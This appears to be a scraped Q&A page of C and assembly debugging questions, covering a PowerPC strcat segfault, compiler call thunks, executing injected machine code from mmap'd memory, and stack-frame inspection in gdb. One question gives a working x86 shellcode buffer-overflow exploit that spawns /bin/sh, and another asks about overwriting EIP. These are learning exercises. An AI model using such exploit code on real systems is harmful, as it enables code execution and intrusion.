Assembly of Powerpc encountered Program received signal SIGSEGV Segmentation fault - c

When I try to store something from register to memory, I received Segmentation fault error. As I used gdb to debug line by line, it shows up Program received signal SIGSEGV when comes to the line of stb.
What I tried to do is to implement the standard C strcat function in PowerPC Assembly.
Here's the main C program, pretty simple.
#include<stdio.h>
extern char *mystrcat(char *first, char *second);
int main(){
char *first, *second, *third;
first = "ab";
second = "cd";
third = mystrcat(first, second);
printf("%s\n", third);
return 0;
}
And this is my mystrcat.s powerpc assembly file.
.text
.align 2
.globl mystrcat
mystrcat:
mr %r5, %r3
.L1:
lbz %r6, 0(%r5)
cmpdi %r6, 0
beq .L2
addi %r5, %r5, 1
b .L1
.L2:
lbz %r6, 0(%r4)
stb %r6, 0(%r5)
addi %r4, %r4, 1
addi %r5, %r5, 1
cmpdi %r6, 0
beq .L3
b .L2
.L3:
blr
Before the L2 label is the process finding the end of the first string.
Gdb showed up "Program received signal SIGSEGV" at the second line after L2 label.
The stb %r6, 0(%r5) command seems raised the error.
But I just don't get it why it cannot figure out address by 0(%r5).
I've tried other command seems like stbx or stbu but no one works.
Thank you for everyone can give me even just little piece of advice.
Update:
I realized this has something to do with memory.
Since the memory for string is readonly, is there a way that I can allocate new memory inside assembly code? I tried "bl malloc" and "nop" and the behavior beyonds my understanding.

In your main function, you try to concatenate 2 strings with the destination one having no room enough to copy the source one at the end.
Trying to add a (kind of implicit) memory allocation in your function mystrcat will introduce confusion.
Note that the segmentation fault also appears using the standard strcat that you want to mimic.
You should fix you main function, writing something like that:
#include <stdio.h>
extern char *mystrcat(char *first, char *second);
int main(){
char first[8] = "ab";
char *second, *third;
second = "cd";
third = mystrcat(first, second);
printf("%s\n", third);
return 0;
}

String literals are stored in read only section of memory. Any attempt to modify string literals results in undefined behavior.

Related

Why my compiler (VS2017) choose for 'CALL-JMP' to reach a subroutine instead of just 'CALL'?

C code:
#include <stdio.h>
int main(){
printf("hello word!\n");
return;
}
Assembly code:
push offset aHelloWord ; "hello word!\n"
call sub_41104B
add esp, 4
Now, I expect sub_41104B will lead directly to printf, but thats not the case:
sub_41104B proc near
jmp sub_411870
sub_41104B endp
And finally, in sub_411870, the printf function starts. Can someone explain why the compiler didn't use just directly call sub_411870?
Now, I expect sub_41104B will lead directly to printf ...
... or directly to puts().
... but thats not the case
Did you disassemble the object file or the final EXE file?
If you disassembled the EXE file, it is probable that the function you called is implemented in the LIB file as function "renaming" another one:
int puts(const char *text) // this is sub_41104B
{
return __x_puts(text); // __x_puts is sub_411870
}
You see this very often when calling a function in a DLL file. However, in the case of DLL files the jmp instruction is an indirect jump (jmp dword ptr [411870]), not a direct one.

Decode function pointer in C

Is it possible to store a function pointer contents in C. I know you can store every kind of pointer in a variable. But if I can "unwrap" an integer pointer (to an integer) or string pointer (to an unsigned char), wouldn't I be able to decode a function pointer.
To be more clear, I mean to store the machine code instructions in a variable.
You're missing an important fact: A function isn't a (first-class) object in C.
There are two basic types of pointers in C: Data pointers and function pointers. Both can be dereferenced using *.
The similarities end here. A data object has a stored value, so dereferencing a data pointer accesses this value:
int a = 5;
int *b = &a;
int c = *b; // 5
A function is just this, a function. You can call a function, so you can call the result of dereferencing a function pointer. It doesn't have a stored value:
int x(void) { return 1; }
int (*y)(void) = &x; // valid also without the address-of operator
// ...
int main(void)
{
int a = (*y)(); // valid also without explicit dereference like int a = y();
}
For ease of handling, C allows omitting the & operator when assigning a function to a function pointer and also omitting the explicit dereference when calling a function through a function pointer.
In short: using pointers doesn't change anything about the semantics of data objects vs functions.
Also note in this context that function and data pointers aren't compatible. You can't assign a function pointer to void *. It's even possible to have a platform where a function pointer has a different size from a data pointer.
In practice, on a platform where a function pointer has the same format as a data pointer, you could "convince" your compiler to access the actual binary code located there by casting your pointer to const char *. But be aware this is undefined behavior.
A pointer in C is the address of some object in memory. An int * is the address of an int, a pointer to a function is the address where the code of the function is stored in memory.
While you can read some bytes from the address of a function in memory, they are just bytes and nothing else. You need to know how to interpret these bytes in order to "store the machine code instructions in a variable". And the real problem here is to know where to stop, where the code of one function ends and the code of another function begins.
These things are not defined by the language and they depend on many factors: the processor architecture, the OS, the compiler, the compiler flags used to compile the code (for optimizations f.e.).
The real question here is: assuming you can "store the machine code instructions in a variable" how do you want to use it? It is just a sequence of bytes meaningless for most humans and it cannot be used to execute the function. If you are not writing a compiler, linker, emulator, operating system or something similar, there is nothing useful you can do with the machine code instruction of a function. (And if you are writing one of the above then you know the answer and you do not ask such questions on SO or somewhere else.)
Assume we are talking about von Neumann architecture.
Basically we have a single memory which contains both instructions and data. However modern OSes are able to control memory access permissions (read/write/execute).
Standardwise it is undefined behaviour to cast function pointer to data pointer. Although if we are talking say Linux, gcc and modern x86-64 CPU, you may do such a conversion, what you'll get will be a pointer into readonly executable segment of memory.
For instance take a look at this simple program:
#include <stdio.h>
int func() {
return 1;
}
int main() {
unsigned char * code = (void*)func;
printf("%02x\n%02x%02x%02x\n%02x%02x%02x%02x%02x\n%02x\n%02x\n",
*code,
*(code+1), *(code+2), *(code+3),
*(code+4), *(code+5), *(code+6), *(code+7), *(code+8),
*(code+9),
*(code+10));
}
Compiled with:
gcc -O0 -o tst tst.c
It's output on my machine is:
55 // push rbp
4889e5 // mov rsp, rbp
b801000000 // mov eax, 0x1
5d // pop rbp
c3 // ret
Which as you may see is indeed our function.
Since OS provides you with ability to mark memory executable you may in fact write your functions in runtime all you need is to generate current platform opcodes and mark memory executable. Which is exactly how JIT compilers work. For an excellent example of such a compiler take a look at LuaJIT.
The code here should be a skeleton to inject code into a program. But if you execute it in a SO such as Linux or Windows you will get an exception before the execution of the first instruction the fn_ptr points.
#include <stdio.h>
#include <malloc.h>
typedef int FN(void);
int main(void)
{
FN * fn_ptr;
char * x;
fn_ptr = malloc(10240);
x = (char *)fn_ptr;
// ... Insert code into x that points the same memory of fn_ptr;
x[0]='\xeb'; x[1]='\xfe'; // jmp $ that is like while(1)
fn_ptr();
return 0;
}
If you execute this code using gdb, you obtain this result:
(gdb) l
2 #include <malloc.h>
3
4 typedef int FN(void);
5
6 int main(void)
7 {
8 FN * fn_ptr;
9 char * x;
10
11 fn_ptr = malloc(10240);
12 x = (char *)fn_ptr;
13
14 // ... Insert code into x that points the same memory of fn_ptr;
15 x[0]='\xeb'; x[1]='\xfe'; // jmp $ that is like while(1)
16 fn_ptr();
17
18 return 0;
19 }
(gdb) b 11
Breakpoint 1 at 0x400535: file p.c, line 11.
(gdb) r
Starting program: /home/sergio/a.out
Breakpoint 1, main () at p.c:11
11 fn_ptr = malloc(10240);
(gdb) p fn_ptr
$1 = (FN *) 0x7fffffffde30
(gdb) n
12 x = (char *)fn_ptr;
(gdb) n
15 x[0]='\xeb'; x[1]='\xfe'; // jmp $ that is like while(1)
(gdb) p x[0]
$3 = 0 '\000'
(gdb) n
16 fn_ptr();
(gdb) p x[0]
$5 = -21 '\353'
(gdb) p x[1]
$6 = -2 '\376'
(gdb) s
Program received signal SIGSEGV, Segmentation fault.
0x0000000000602010 in ?? ()
(gdb) where
#0 0x0000000000602010 in ?? ()
#1 0x0000000000400563 in main () at p.c:16
(gdb)
How you see the GDB signals a SIGSEGV, Segmentation fault at the address where fn_ptr points, although the instructions we have into the memory are valid instructions.
Note that the LM Code: EB FE is valid for Intel (or compatible) processor only. This LM Code correspond to the Assembly code: jmp $.
This is an example of use of function pointers where the LM code is copied into a memory area and executed.
The program below doesn't do nothing special! It runs the code that is in the array prg[][] copying it into a memory mapped area. It uses two functions pointer fnI_ptr and fnD_ptr both pointing the same memory area. The program copies the LM code in the memory alternatively one of the two code and then executes the "loaded" code.
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <malloc.h>
#include <sys/mman.h>
#include <stdint.h>
#include <inttypes.h>
typedef int FNi(int,int);
typedef double FNd(double,double);
const char prg[][250] = {
// int multiply(int x,int y)
{
0x55, // push %rbp
0x48,0x89,0xe5, // mov %rsp,%rbp
0x89,0x7d,0xfc, // mov %edi,-0x4(%rbp)
0x89,0x75,0xf8, // mov %esi,-0x8(%rbp)
0x8B,0x45,0xfc, // mov -0x4(%rbp),%eax
0x0f,0xaf,0x45,0xf8, // imul -0x8(%rbp),%eax
0x5d, // pop %rbp
0xc3 // retq
},
// double multiply(double x,double y)
{
0x55, // push %rbp
0x48,0x89,0xe5, // mov %rsp,%rbp
0xf2,0x0f,0x11,0x45,0xf8, // movsd %xmm0,-0x8(%rbp)
0xf2,0x0f,0x11,0x4d,0xf0, // movsd %xmm1,-0x10(%rbp)
0xf2,0x0f,0x10,0x45,0xf8, // movsd -0x8(%rbp),%xmm0
0xf2,0x0f,0x59,0x45,0xf0, // mulsd -0x10(%rbp),%xmm0
0xf2,0x0f,0x11,0x45,0xe8, // movsd %xmm0,-0x18(%rbp)
0x48,0x8b,0x45,0xe8, // mov -0x18(%rbp),%rax
0x48,0x89,0x45,0xe8, // mov %rax,-0x18(%rbp)
0xf2,0x0f,0x10,0x45,0xe8, // movsd -0x18(%rbp),%xmm0
0x5d, // pop %rbp
0xc3 // retq
}
};
int main(void)
{
#define FMT "0x%016"PRIX64
int ret=0;
FNi * fnI_ptr=NULL;
FNd * fnD_ptr=NULL;
void * x=NULL;
//uint64_t p = PAGE(K), l = p*4; //Max memory to use!
uint64_t p = 0, l = 0, line=0; //Max memory to use!
do {
p = getpagesize();line = __LINE__;
if (!p) {
ret=line;
break;
}
l=p*2;
printf("Mem page size = "FMT"\n",p);
printf("Mem alloc size = "FMT"\n\n",l);
x = mmap(NULL, l, PROT_EXEC | PROT_READ | PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0);line = __LINE__;
if (x==MAP_FAILED) {
x=NULL;
ret=line;
break;
}
//Prepares function-pointers. They point the same memory! :)
fnI_ptr=(FNi *)x;
fnD_ptr=(FNd *)x;
printf("from x="FMT" to "FMT"\n\n",(int64_t)x,(int64_t)x + l);
// Calling the functions coded into the array prg
puts("Copying prg[0]");
// It injects the function prg[0]
memcpy(x,prg[0],sizeof(prg[0]));
// It executes the injected code
printf("executing int-mul = %d\n",fnI_ptr(10,20));
puts("--------------------------");
puts("Copying prg[1]");
// It injects the function prg[1]
memcpy(x,prg[1],sizeof(prg[1]));
//Prepares function pointers.
// It executes the injected code
printf("executing dbl-mul = %f\n\n",fnD_ptr(12.3,3.21));
} while(0); // Fake loop to be breaked when an error occurs!
if (x!=NULL)
munmap(x,l);
if (ret) {
printf("[line"
"=%d] Error %d - %s\n",ret,errno,strerror(errno));
}
return errno;
}
In prg[][] there're two LM functions:
The first multplies two integer values and returns an integer value as result
The second multiplies two double-precision values and returns a double precision value as result.
I don't discuss about portability. The code into prg[][] was obtained by objdump -S prgname > prgname.s of an object obtained compiling with gcc ( gcc (Ubuntu 4.8.4-2ubuntu1~14.04.3) 4.8.4 ) without optimization the following code:
int multiply(int a, int b)
{
return a*b;
}
double dMultiply(double a, double b)
{
return a*b;
}
The above code has been compiled on a PC with an Intel I3 CPU (64 bit) and SO Linux (3.13.0-116-generic #163-Ubuntu SMP Fri Mar 31 14:13:22 UTC 2017 x86_64).

Buffer Overflow won't work get Seg Fault

I try to get a Buffer Overflow to work. I have the following simple vulnerable Program:
int main(int argc, char** argv) {
char buffer[80];
strcpy(buffer,argv[1]);
return 1;
}
With the following Program i want to get a Shell with an Buffer Overflow.
char shellcode[]=
"\x31\xc0"
"\x50"
"\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69"
"\x89\xe3"
"\x99"
"\x52"
"\x53"
"\x89\xe1"
"\xb0\x0b"
"\xcd\x80";
char retaddr[] = "\xa8\xd5\xff\xff";
#define NOP 0x90
int main() {
char buffer[96];
memset(buffer, NOP, 96);
memcpy(buffer, "EGG=",4);
memcpy(buffer+4,shellcode,24);
memcpy(buffer+88,retaddr,4);
memcpy(buffer+92, "\x00\x00\x00\x00",4);
putenv(buffer);
printf("%p\n", buffer);
system("/bin/sh");
return 0;
}
This Program creates an Buffer with the shellcode at Beginning. After the Shellcode are some NOP Instruction and then the value that overrides the Return Address and points to the beginning of the Shellcode. Then it creates an Environment Variable with the buffer and starts a Shell.
If i run that program the shell started and the environment Variable is set. But if i try to run the vulnerable Program with the environment Variable as Parameter i get an segmentation fault.
Here are some Screens with gdb:
I don't have enough reputation to post images directly so here is the link to an imgur album with the 4 pictures in it.
The first picture shows the Stack before the strcpy happens.
The second one shows argv 1
The third picture shows the stack after the strcpy.
If you can see 0xf7e00497 is the return address. If i disassamble this address the code for the libc function is shown.
In the third picture you see that this address is overridden by the address 0xffffd5a8 witch points to the top of the stack.
In Picture Number 4 you see the segmentation fault if the programm countinous to run.
Can anybody tell my why? Everything seems to be okay?
I compiled both programmes with the -fno-stack-protector option of gcc.
Thanks #type1232, the issue was that the stack is not executable.
With execstack -s vulProg, the shellcode will run.

Can't exploit stack overflow

I'm learning buffer overflows, and I have a problem with exploiting a stack based buffer overflow.
Here is my program:
#include <stdio.h>
void func(){
printf("asd");
}
main(){
char buf[10];
scanf("%s", &buf);
}
I'm overwriting first 14 bytes with A's(the buffer and the old EIP address). My goal is to execute the func function, or to change the EIP with it's address. But I'm always getting illegal instruction. I have check the HEX address of the function; I have written them in reverse order and they are correct.
You will have to look at the compiled code in assembler e.g.
your main() may look like:
char buf[10];
scanf("%s", &buf);
00D7B938 mov esi,esp
00D7B93A lea eax,[ebp-14h]
00D7B93D push eax
00D7B93E push offset string "%s" (0D818D4h)
00D7B943 call dword ptr [__imp__scanf (0D89684h)]
You'll have to debug to see what is actually on the stack at this point, e.g. if you are compiling in debug, it is highly likely there's a lot more on the stack than you may think !

How does the stack frame look like in my function?

I am a beginner at assembly, and I am curious to know how the stack frame looks like here, so I could access the argument by understanding and not algorithm.
P.S.: the assembly function is process
#include <stdio.h>
# define MAX_LEN 120 // Maximal line size
extern int process(char*);
int main(void) {
char buf[MAX_LEN];
int str_len = 0;
printf("Enter a string:");
fgets(buf, MAX_LEN, stdin);
str_len = process(buf);
So, I know that when I want to access the process function's argument, which is in assembly, I have to do the following:
push ebp
mov ebp, esp ; now ebp is pointing to the same address as esp
pushad
mov ebx, dword [ebp+8]
Now I also would like someone to correct me on things I think are correct:
At the start, esp is pointing to the return address of the function, and [esp+8] is the slot in the stack under it, which is the function's argument
Since the function process has one argument and no inner declarations (not sure about the declarations) then the stack frame, from high to low, is 8 bytes for the argument, 8 bytes for the return address.
Thank you.
There's no way to tell other than by means of debugger. You are using ia32 conventions (ebp, esp) instead of x64 (rbp, rsp), but expecting int / addresses to be 64 bit. It's possible, but not likely.
Compile the program (gcc -O -g foo.c), then run with gdb a.out
#include <stdio.h>
int process(char* a) { printf("%p", (void*)a); }
int main()
{
process((char *)0xabcd1234);
}
Break at process; run; disassemble; inspect registers values and dump the stack.
- break process
- run
- disassemble
- info frame
- info args
- info registers
- x/32x $sp - 16 // to dump stack +-16 bytes in both side of stack pointer
Then add more parameters, a second subroutine or local variables with known values. Single step to the printf routine. What does the stack look like there?
You can also use gdb as calculator: what is the difference in between sp and rax ?
It's print $sp - $rax if you ever want to know.
Tickle your compiler to produce assembler output (on Unixy systems usually with the -S flag). Play around with debugging/non-debugging flags, the extra hints for the debugger might help in refering back to the source. Don't give optimization flags, the reorganizing done by the compiler can lead to thorough confusion. Add a simple function calling into your code to see how it is set up and torn down too.

Resources